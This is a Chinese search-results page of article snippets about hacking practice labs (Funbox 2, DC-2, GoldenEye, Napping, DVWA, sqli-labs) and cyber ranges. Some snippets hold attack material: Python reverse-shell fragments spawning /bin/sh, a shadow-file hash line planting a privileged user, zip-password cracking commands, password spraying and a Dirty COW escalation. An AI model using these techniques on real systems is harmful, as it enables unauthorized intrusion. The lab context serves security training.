- 综合排序
- 最热优先
- 最新优先
- 来自专栏红队蓝军
Funbox 2靶场复现
iubire 基于得到的密码,对tom.zip 进行解压,得到rsa私有密钥,这个时候通过id_rsa登录ssh 登录 ssh -i id_rsa tom@192.168.56.103 使用zip2john 破解zip密码 使用zip2john工具将要破解的zip转为hash,在通过john 碰撞。 这里就演示tom.zip cathrine.zip zip2john tom.zip > 1.txt john 1.txt zip2john cathrine.zip > 2.txt john 2. txt 破解tom.zip密码 破解cathrine.zip密码 2、提权 suid提权 发现存在-rbash,RBASH 是一种特殊的 shell,它限制了用户的一些操作和权限 绕过rbash,
23800编辑于 2025-02-12 - 来自专栏OneMoreThink的专栏
攻防靶场(23):DC-2
扫描端口和服务,发现80/http和7744/ssh 1.3 主动扫描:字典扫描 扫描目录,发现网站是wordpress 访问http://10.58.81.141/,会301跳转到http://dc-2/ ,但域名无法解析 在/etc/hosts中添加域名解析后,成功打开http://dc-2/ 1.4 搜索目标网站 浏览网站,发现靶机作者提示使用cewl进行信息收集 使用cewl收集到一批字典 3. 初始访问 3.1 有效账户:默认账户 将cewl收集的字典作为密码,结合wpscan扫描到的帐号进行爆破,获得2个WordPress的有效账户 3.2 有效账户:默认账户 密码喷洒攻击,将有效账户在SSH
26510编辑于 2024-10-28 - 来自专栏OneMoreThink的专栏
应急靶场(7):Linux2
在x2_user_group表中,得知groupid是1代表管理员组。 user-app-register,其次是/version2.php。 uniq -c | grep -C 10 version2.php 查看攻击者访问/version2.php时的情况,发现攻击者大量访问/version2.php前,先大量访问了/index.php? 在Wireshark中使用语法http.request.uri contains version2.php查看攻击者访问/version2.php的情况,发现请求体和响应体都是经过编码的内容,疑似加密通信隧道 六、提交攻击者使用的后续上传的木马文件名称 在第3题时,已经确认后续上传的木马文件名称是:version2.php。
38810编辑于 2024-10-15 - 来自专栏时间之外沉浮事
美国家网络空间靶场(NCR)2
每套可重新配置的测试套件的包含2间操作室和1间简述/汇报的会议室,意味着在现场就NCR进行测试与评估服务,NCR至少可以同时开展两场现场级的测试事件。 比如2间操作室保证了其测试与评估支持的种类与人员,如最新安全病毒样本的测试与评估服务,2间操作室可保证容纳更多现场的测试人员;此外,在红蓝对抗及攻防对抗测试中,2间不同的操作室也可分别提供给不同的红蓝队伍进行使用 2)、NCR封装架构与操作流程 NCR封装架构与操作流程开发用隔离在多个分类级别(即未分类、机密、最高机密等)的计算和网络资源的最新解决方案提供非常快速地清理和重用NCR资源的功能。 自动电子交换设备在单个平台上实现了电口和光口混合的无阻塞交换架构,支持L1交换和L2-4层报文过滤、编辑、卸载头部、加时戳、截断等功能的融合。 根据2014年公开的资料,美国国防部试验资源管理中心(TRMC)主要管辖的靶场和测试设施基础(MRTFB):包含的“关键核心”23个站点:其中陆军8个、海军6个、空军7个、国防部直属2个。
3K10发布于 2019-12-03 - 来自专栏OneMoreThink的专栏
应急靶场(2):Windows Server 2022 - Web1
下载好靶场(前来挑战!应急响应靶机训练-Web1)并搭建好环境,无需密码直接进入靶机的Administrator帐号。
59910编辑于 2024-10-15 - 来自专栏全栈程序员必看
dvwa靶场教程_web漏洞靶场
人间烟火气,最温暖人心 目录: DVWA靶场的概括: 下载 DVWA: 下载 phpStudy: DVWA靶场的安装步骤: ---- DVWA靶场的概括: : 第一步:安装phpStudy 第二步:(1)修改phpStudy端口的常用设置 (2)把80端口改为801端口 第三步:(1)打开网站根目录 ( 2)把DVWA解压放到网站根目录下 第四步:(1)打开DVWA找到config,将其打开 (2)config.inc.php.dist文件复制一个出来 (3)将(复件 config.inc.php.dist http://127.0.0.1:801/DVWA(127.0.0.1是本地的IP地址,801是端口,DVWA是目录),然后点击Create / Reset Database(创建/重置数据库) (2) (3)DVWA靶场的账号:admin 密码:password (4)成功进入后的页面.
2K10编辑于 2022-09-27 - 来自专栏OneMoreThink的专栏
应急靶场(3):Windows Server 2022 - Web2
下载好靶场(前来挑战!应急响应靶机训练-Web2)并搭建好环境,使用帐号密码(administrator / Zgsf@qq.com)登录靶机。 一、攻击者的IP地址(两个)? 2、不是数据库攻击。 打开phpStudy启动Apache和MySQL,并查看数据库密码。
53610编辑于 2024-10-15 - 来自专栏好靶场
【好靶场】SQLMap靶场攻防绕过 (一)
0x00 前言最近遇到很多在做基础靶场的小伙伴们都在SQLMap一把索,那么所幸搞一个SQLMap绕过的靶场。我们是好靶场,一个立志于让所有学习安全的同学用上好靶场的团队。
61610编辑于 2025-09-10 - 来自专栏黑客编程
ColddBox 靶场
本文转载自助安社区(https://secself.com/),海量入门学习资料。
1.2K10编辑于 2023-04-11 - 来自专栏安全学习记录
靶场学习-突破有防护的靶场
突破有防护的靶场 首先使用常规的目录扫描,无法正常扫描出东西 使用代理池低速扫描成功发现robots.txt 访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
27530编辑于 2023-10-17 - 来自专栏安全学习记录
靶场学习-突破有防护的靶场
突破有防护的靶场 首先使用常规的目录扫描,无法正常扫描出东西 使用代理池低速扫描成功发现robots.txt 访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
25020编辑于 2023-10-17 - 来自专栏安全学习记录
靶场学习-自建三层内网靶场
自建内网靶场 https://github.com/yangzongzhuan/RuoYi/releases ruoyi-admin\target\classes\application-druid.yml
1.1K30编辑于 2023-03-29 - 来自专栏betasec
某大学渗透测试实战靶场报告-Part2
(2) 192.168.3.x段常用端口信息 ? (4) 192.168.3.x MySQL弱口令 使用shack2师傅写的SNETCracker超级弱密码检查工具跑出3台存在MySQL弱口令机器,项目地址:https://github.com/shack2 注:按照他们给的靶场说明来看应该是通过192.168.5.x堡垒机直接进入192.168.1.4日志服务器,因为只有192.168.5.x段能与192.168.1.4相通,但是在测试中发现192.168.1.4 0x04 第四阶段(192.168.4.1) (1) 团队成员“欧根亲王号”老哥通过靶场内网中的“布谷鸟2018”社交软件对他们值班人员进行社工,成功得到192.168.1.4日志服务器密码,而且也得到了 ,也不排除其中有些人在靶场上边“捣蛋”,几个朋友都是因为总是碰到这些问题而放弃挣扎的。
1.2K20发布于 2020-07-31 - 来自专栏cjz的专栏
Vulhub 靶场使用
docker-compose up -d 查看docker容器运行服务端口 docker ps 获取容器/镜像的元数据(理解为查看容器ip) [容器ID]为漏洞环境所在容器,我的为766b16b2a964 docker inspect [容器ID] | grep IPAddress 例如: docker inspect 766b16b2a964 | grep IPAddress 如果访问不了页面, 所以,其实命令是包含了 docker-compose up -d docker-compose build 但是如果更新了配置文件,则需要手工来重新编译靶场环境。
91970编辑于 2022-12-21 - 来自专栏用户9703952的专栏
vulnhub靶场搭建
,将插件放到和virtualbox同一个目录下,并且将插件导入到virtualbox中
72710编辑于 2024-02-19 - 来自专栏Python
【less-2】sqli-labs靶场第二关
-2/? 经过语句and 1=2测试 ,页面回显易常,所以该地方是数值查询。 https://sqli.wmcoder.site/sqli-labs/Less-2/? id=1 order by 3--+ 第三步:使用union select 1,2,3联合查询语句查看页面是否有显示位 发现页面先输出了2和3,说明页面有2个显示位。 -2/? /sqli-labs/Less-2/?
37710编辑于 2024-10-12 - 来自专栏时间之外沉浮事
靶场发展态势⑥欧洲典型靶场发展现状
本文将欧洲的网络空间靶场类型分为三种:一是美系支持或建设的网络空间靶场,典型的包括英国的联邦网络空间靶场、北约在爱沙尼亚塔林建立的北约网络空间靶场;二是部分欧洲国家自主建设的网络空间靶场,如法国、瑞典的网络空间靶场 ,也推出有自身的网络空间靶场,其网络空间靶场主要的客户主要是欧美系的军政单位,比较知名的除英国联邦网络空间靶场(FCR),还有澳大利亚国防军的网络空间靶场。 该靶场是北约联盟的一部分,在北约中,所有北约成员国会将其国民生产总值(GDP)的2%用于国防开支,并利用这些资金,北约联盟能够执行其年度预算,用于进行网络战等军事计划。 剩下的11个工作包将在对第2阶段芬兰的领导下对第1阶段的结果进行审查后完成。 在联合建设中,所有国家的网络空间靶场通过统一调度平台网络防御培训和演习协调平台(CD TEXP)进行资源共享和任务调度。 小结 ---- 从美军及欧洲的网络空间靶场的建设中我们可以归纳以下几点: 1、涉及网络战及测试演训建设的网络空间靶场多由国家级安全部门或军方单位牵头,并且建设规模和资金不小; 2、网络空间靶场强调联合资源共享和调度
3.3K20发布于 2019-12-18 - 来自专栏糖果的实验室
Web安全靶场
DVWA作为安全靶场软件,集合了各种常见的漏洞PHP代码。 安全靶场有很多种,DVWA是众多靶场中的一个,对于经典的PHP的Web漏洞,DVWA虽然不能说表现的多么惊艳,但对于模拟漏洞的现场,用于复现测试,可以达到预期效果,例如:WebShell执行这种漏洞的复现
98240发布于 2021-07-19 - 来自专栏Cyber Security
【vulhub靶场】GoldenEye
Tomcat账号密码传输形式,尝试使用Burp Intruder模块进行暴力破解 攻击类型为sniper方式,Payload类型为Custom iterator position1为用户名,position2为 www.baidu.com --log-xml=baidu.xml #将扫描结果导出至文件内 两种思路: 1、直接找关于moodle历史漏洞(尝试匹配版本进行利用) 尝试找最近的高危漏洞来对这个18年的靶场进行降维打击 这里试了一遍发现除了第0个不需要admin的密码,其他都需要管理员密码,但是第一个是针对3.x版moodle 意思就是还要获取admin的密码,不过这里还是有收获的得到了cms的版本号 …… 2、 s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' == /les.sh 这里使用脏牛漏洞,当然还有其他内核漏洞可以使用 适用范围:2.6.22<内核版本<3.9 通过编译器类型枚举,发现靶场没有gcc编译器,存在clang编译器 gcc --version
86610编辑于 2024-07-18 - 来自专栏潇湘信安
vulnhub 靶场 napping
0x01 靶场信息 下载地址:https://www.vulnhub.com/entry/napping-101,752/ 发布日期:2021 年 10 月 22 日 作者:hadrian3689 描述 注2:注1所说的是标签存具有target属性,值为_blank,同时没有使用rel="noopener"属性时只有IE成功。 s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) from datetime 用户名 2. 密码,x表示密码保存在/etc/shadow 3. UID,0代表root 4. GID,表示所在组 5. 保留 将用户密码信息写入shadow文件中 supertest:$6$aaa$rzNpVK12/RIxUFx.HixBbeRuIJYfw78hhQ8ocZfh5S2dIwa1r7dGW52qww4wcngdOzj3A5r9ni9a8C.mruV2M0
1.1K10编辑于 2023-03-10
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号